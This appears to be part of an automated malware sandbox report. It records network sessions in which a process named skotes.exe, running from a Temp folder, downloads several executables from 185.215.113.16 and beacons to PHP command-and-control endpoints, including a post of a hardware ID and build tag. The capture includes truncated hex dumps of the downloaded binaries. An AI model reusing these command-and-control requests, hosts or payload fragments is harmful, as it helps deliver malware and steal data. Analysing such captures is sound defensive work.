63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 34 66 34 62 32 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 <c>1015173001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1015174001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1015175001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50242	185.215.113.16	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:17.840151072 CET	138	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 10:55:25 GMT If-None-Match: "675d641d-ece00"
Dec 14, 2024 13:00:19.176222086 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:18 GMT Content-Type: application/octet-stream Content-Length: 970240 Last-Modified: Sat, 14 Dec 2024 11:58:17 GMT Connection: keep-alive ETag: "675d72d9-ece00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d1 72 5d 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELr]g"w@0@@@d\|@bu4@.text `.rdata@@.datalpH@.rsrcb@d@@.relocuvX@B
Dec 14, 2024 13:00:19.176280975 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 14, 2024 13:00:19.176318884 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 14, 2024 13:00:19.176354885 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 14, 2024 13:00:19.176393986 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 14, 2024 13:00:19.176429033 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 14, 2024 13:00:19.176467896 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 14, 2024 13:00:19.176594019 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 14, 2024 13:00:19.176742077 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 14, 2024 13:00:19.176776886 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 14, 2024 13:00:19.296821117 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50243	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:23.470815897 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015173001&unit=246122658369
Dec 14, 2024 13:00:24.815068007 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50244	185.215.113.16	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:24.940887928 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 10:56:44 GMT If-None-Match: "675d646c-1b9000"
Dec 14, 2024 13:00:26.330259085 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:25 GMT Content-Type: application/octet-stream Content-Length: 1828864 Last-Modified: Sat, 14 Dec 2024 11:59:36 GMT Connection: keep-alive ETag: "675d7328-1be800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 6a 00 00 04 00 00 10 b7 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*pj@j@M$a$$ $h@.rsrc$x@.idata $z@ P+$\|@vdtghsquPPB~@cyxsntsn`j@.taggant0pj"@
Dec 14, 2024 13:00:26.330343008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:26.330435038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:26.330471039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:26.330553055 CET	496	IN	Data Raw: ee f4 93 4d ac 2c f5 a6 ea 39 36 58 fe 71 51 07 20 4d 1d b9 ad 69 58 c9 15 71 95 e0 01 ed 8e b4 3d ab 86 df 2d 23 be 07 03 07 ac 83 cd 93 50 dd e5 91 ae d9 d9 61 5d 1d f0 71 49 76 56 42 45 66 e0 75 71 71 18 ef 8e d9 ec 59 59 f1 09 51 1d de 2b 92 Data Ascii: M,96XqQ MiXq=-#Pa]qIvVBEfuqqYYQ+wunQYh>)=4nCLjR+p?-I,"I1_0@r&DqaE(NNz/vxBMxE?-f37N}j5BXKV
Dec 14, 2024 13:00:26.330586910 CET	1236	IN	Data Raw: 7d 2c 8d 0d da 16 fb cc b4 ad 10 fe 99 f1 5f b1 89 4b 61 05 2f 84 a4 9d 16 0b 88 51 3f 0d f9 fa 42 fb 2e d9 b9 ef 65 13 94 67 9b 4e bc f1 73 e9 05 fd d3 d7 b2 5d 14 96 47 4f 65 ce 01 46 25 ad aa 84 c7 86 ff 46 11 ac 8b 41 63 c4 da 79 79 ce 67 68 Data Ascii: },_Ka/Q?B.egNs]GOeF%FAcyyghI%O<&%G&$oz1?'OI,u/mK51'8>yt%uf:l1,V8XUmMF4Lm\6E4z%BM0K6b20o}
Dec 14, 2024 13:00:26.330665112 CET	1236	IN	Data Raw: 28 41 db 2f 39 4d 76 71 21 71 92 31 e8 cc e1 2e 3f 65 36 4b ff 44 85 87 ab c0 75 ed aa 18 5c ac f9 f1 16 c9 c3 35 65 e8 70 29 1d e0 c8 5d 91 18 fe 8a 1f bc 12 17 43 a1 e1 ec 32 78 0a 3a a4 5e 21 3f a0 be c2 c5 90 3a 33 ef fa ca 36 f6 86 d9 54 ed Data Ascii: (A/9Mvq!q1.?e6KDu\5ep)]C2x:^!?:36TQMq5aiG17)5a]l}o+yF{="UWDjULcTSw0Ws\LQyg7FmMmuR~>u<%M &*2v^
Dec 14, 2024 13:00:26.330744982 CET	1236	IN	Data Raw: 46 ed 74 99 ac 48 78 ad 6f 9e f6 4d 3a d9 77 51 b7 7b 6e d7 ee ba d6 07 3a b9 67 f5 ef 55 14 d7 ee f5 36 06 3a 99 67 89 28 96 a5 de a8 19 51 ad 35 94 67 d1 b7 7b 20 49 3a 6e 6d d9 29 7f 45 08 1c 01 64 86 39 52 0a 96 ac 42 b5 a6 29 f7 64 29 16 12 Data Ascii: FtHxoM:wQ{n:gU6:g(Q5g{ I:nm)Ed9RB)d);Jy.vWaq&ea`ozMJeyqr^O9AMTT9s]G{tuafMwQ:zr81(sy:-}yIN,YqYW2@ic_8};+M.[Mo}:+
Dec 14, 2024 13:00:26.330779076 CET	1236	IN	Data Raw: b6 0d b4 79 01 71 4b c1 49 89 66 23 ab 65 6d 4e 14 bf 74 8d b7 4b 23 d0 ca cc 62 01 39 4a a1 d1 95 f1 c7 2d c1 21 26 d2 d9 ed 54 9d 01 c4 76 79 f0 f1 60 21 ac 4b a1 4a fe ee ad a6 99 79 d9 4d b8 f5 5c e8 ef 2d 35 a6 51 7a e9 07 14 02 66 cd 01 a3 Data Ascii: yqKIf#emNtK#b9J-!&Tvy`!KJyM\-5QzfEN(tUH9Qf=(S").}]<gKOaQQIhFrMd>*K)qOJq9BaVe?IdM"+;v-{g[7M{iz!T)a9z0QBvy0f
Dec 14, 2024 13:00:26.330862045 CET	1236	IN	Data Raw: e1 29 67 91 81 2e f1 ce ff 18 56 d7 2a 7f 6d da 15 52 67 d1 a9 f1 ee 02 7c 71 ac f9 9f da fe d6 99 72 27 4c 3a 0b 72 cf 27 b1 60 d1 7d ed ee 4f ec 35 10 8f 8f 51 35 d9 ec 95 74 49 fa 5c c7 a6 59 71 1d 07 a8 91 9f 56 45 33 eb a0 ef 7b 1b d3 d9 f4 Data Ascii: )g.V*mRg\|qr'L:r'`}O5Q5tI\YqVE3{sUEM:){^RfQJ,}b\|&9[{7;S)Qrb`(1g+)uu$+v}(qR"$zT1t]BrTMhG[,k;%fnfIH4J16Di
Dec 14, 2024 13:00:26.451066971 CET	1236	IN	Data Raw: 2c fd ae aa a6 68 f6 ef da 69 0c 77 8d 21 c6 b9 82 98 fe 18 b6 d8 5c 78 62 e7 88 4c 80 46 b9 dd ae 03 cd 8e 83 f4 35 84 b2 00 57 85 09 29 73 69 80 85 88 70 19 fb 1a df 36 f6 eb d9 83 84 ec a1 34 6b 94 b4 61 d1 e1 f0 ec 26 a2 e7 0a 99 4e c2 e2 f9 Data Ascii: ,hiw!\xbLF5W)sip64ka&N)EhH$HAKE~`5Dd-QCclfnqLm@_KE=}jIvB:x);`t(%..{3p]U}I(l/5e

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	50245	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:31.044814110 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 13:00:32.425430059 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 12:00:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 13:00:32.428755999 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 2d 2d 0d 0a Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="build"stok------IIEBKJECFCFBFIECBKFB--
Dec 14, 2024 13:00:32.878714085 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 12:00:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50246	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:31.958324909 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015174001&unit=246122658369
Dec 14, 2024 13:00:33.314508915 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50247	185.215.113.16	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:33.446474075 CET	138	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 10:55:53 GMT If-None-Match: "675d6439-2aa400"
Dec 14, 2024 13:00:34.807785034 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:34 GMT Content-Type: application/octet-stream Content-Length: 2740224 Last-Modified: Sat, 14 Dec 2024 11:58:43 GMT Connection: keep-alive ETag: "675d72f3-29d000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 8d 0b 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ *`Ui` @ @.rsrc`2@.idata 8@yfueqkee)p):@ympaktlu )@.taggant@@*")@
Dec 14, 2024 13:00:34.807806969 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.807822943 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.807837963 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.807854891 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.807872057 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.807889938 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.807990074 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 13:00:34.808006048 CET	1236	IN	Data Raw: e1 1e 55 55 5e 9c 37 06 9f 26 70 49 df 93 f1 08 30 ab 37 16 21 3a 00 4b e7 52 04 95 d8 f8 2a 0a 5d 15 d2 9f dc 40 c5 01 39 8e 18 42 58 df f1 d1 9a 50 99 5a 56 79 04 d1 b7 d0 32 94 e0 eb 1e ed 5f ad fc 49 0c 81 1e 71 7a 80 d7 09 c8 86 d1 74 e8 7f Data Ascii: UU^7&pI07!:KR*]@9BXPZVy2_Iqzt\N2duRLdWo01} dHb_Q7nC\xNG~Ga&Gtc8M3I"%YI"sFTB&f$\e/8lmS3N^Uq)^GG=mm:
Dec 14, 2024 13:00:34.808022022 CET	1236	IN	Data Raw: ba 6d 83 fb cd d0 45 4a 5f e2 f8 e2 60 e5 ba 93 a5 08 06 fb d7 0d 52 bd cf 4d 30 fb 25 44 33 59 a3 2e 07 46 4b 5d f6 c7 de 73 f4 50 11 4f 60 52 e1 70 14 23 ad 21 fd 9e 99 5e 05 1f 1b 75 00 f1 e2 bc 15 d2 04 cd 0a 57 89 25 5a e6 b2 51 1d 51 35 8f Data Ascii: mEJ_`RM0%D3Y.FK]sPO`Rp#!^uW%ZQQ5""a9mV4HRrT\|-bVGn,e.^?SbHQAI<OO4m`.z,]7A3@T\|_FOU!?f3t-#XtOj/I\|
Dec 14, 2024 13:00:34.927946091 CET	1236	IN	Data Raw: 4c b0 c5 4e a8 a7 24 1c 02 7b 0c 4a 75 f6 75 c9 03 f8 07 90 a9 16 4a 44 c0 c2 ea fa 7f 8f db ec 02 b8 17 03 2b 96 ab 98 fe dd 6a 06 60 98 fa cf 40 83 e5 0f 70 8a a8 a8 4d a7 ac fc a9 27 74 6f 15 47 c1 7e 6e 81 40 07 c0 e2 21 e7 23 e9 5e b0 ac 94 Data Ascii: LN${JuuJD+j`@pM'toG~n@!#^:$xl<: a2QS-;)1`4teU`,/Snj1%c$B{R:HnFQKdZpu[Re

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50248	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
